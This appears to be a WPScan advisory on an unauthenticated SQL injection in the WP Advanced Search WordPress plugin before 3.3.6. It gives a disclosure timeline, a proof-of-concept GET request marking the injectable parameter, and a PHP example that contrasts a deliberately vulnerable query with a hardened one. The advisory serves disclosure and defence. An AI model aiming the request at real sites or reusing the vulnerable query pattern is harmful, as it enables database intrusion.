WP Advanced Search < 3.3.6 - Unauthenticated SQL Injection
Description
Because the plugin builds SQL queries by string concatenation, allows the vulnerable PHP file to be requested directly, and does not follow best practices for coding SQL operations, there is an unauthenticated SQL injection in autocompletion-PHP5.5.php.
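As an added illustration (constructed for this page, not code from the plugin or from the advisory), the PHP below contrasts the two coding patterns the description refers to: a query assembled by string concatenation from request parameters, beside a version that refuses direct requests, allowlists the table and column identifiers, and binds the search value through $wpdb->prepare(). The parameter names q, t and f are taken from the proof-of-concept request on this page; the function names, the allowlist contents and the meaning assigned to t (table) and f (field) are assumptions.

```php
<?php
// Constructed example; not the plugin's code. Assumes WordPress' global $wpdb.
// Function names, the allowlist and the table/column roles are hypothetical.

// Loading guard: when the file is requested directly, ABSPATH is not defined,
// so nothing below runs and WordPress' own access checks cannot be bypassed.
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// Vulnerable pattern: request input (search term, table, field) is concatenated
// straight into the SQL text, so any of the three can alter the query.
function autosuggest_vulnerable( $q, $t, $f ) {
    global $wpdb;
    $sql = "SELECT `$f` FROM `$t` WHERE `$f` LIKE '" . $q . "%' LIMIT 10";
    return $wpdb->get_col( $sql );
}

// Hardened pattern: identifiers cannot be bound as parameters, so they are
// checked against a fixed allowlist; the value is bound with $wpdb->prepare().
function autosuggest_hardened( $q, $t, $f ) {
    global $wpdb;

    // Allowlist of table => columns this endpoint may query (constructed values).
    $allowed = array(
        $wpdb->prefix . 'autosuggest' => array( 'term', 'title' ),
    );
    if ( ! isset( $allowed[ $t ] ) || ! in_array( $f, $allowed[ $t ], true ) ) {
        return array(); // unknown table or column: refuse rather than interpolate
    }

    // %s placeholder: prepare() quotes and escapes the value; esc_like() stops
    // user-supplied % and _ from acting as LIKE wildcards.
    $sql = $wpdb->prepare(
        "SELECT `$f` FROM `$t` WHERE `$f` LIKE %s LIMIT 10",
        $wpdb->esc_like( $q ) . '%'
    );
    return $wpdb->get_col( $sql );
}
```

The allowlist is the part that matters for the f and t parameters: $wpdb->prepare() only protects values, so a column or table name taken from the request has to be compared against a fixed set of known identifiers rather than escaped.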

After a month of trying to contact the Plugin author (Twitter, email), we followed generally accepted disclosure guidelines.

Edit (WPScanTeam):
April 1st, 2020 - Report received & Escalated to WP Plugins Team
April 1st, 2020 - WP Plugin Team Investigating & Plugin closed
April 2nd, 2020 - Disclosing
April 3rd, 2020 - v3.3.6 released, fixing the issue
Proof of Concept
GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[INJECT]&type=&e= HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Affects Plugin

Fixed in version 3.3.6

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Teamwork
Submitter Twitter @frycos
Views 1573
Verified No
WPVDB ID 10162

Timeline

Publicly Published 2020-04-02 (about 2 months ago)
Added 2020-04-02 (about 2 months ago)
Last Updated 2020-04-10 (about 1 month ago)
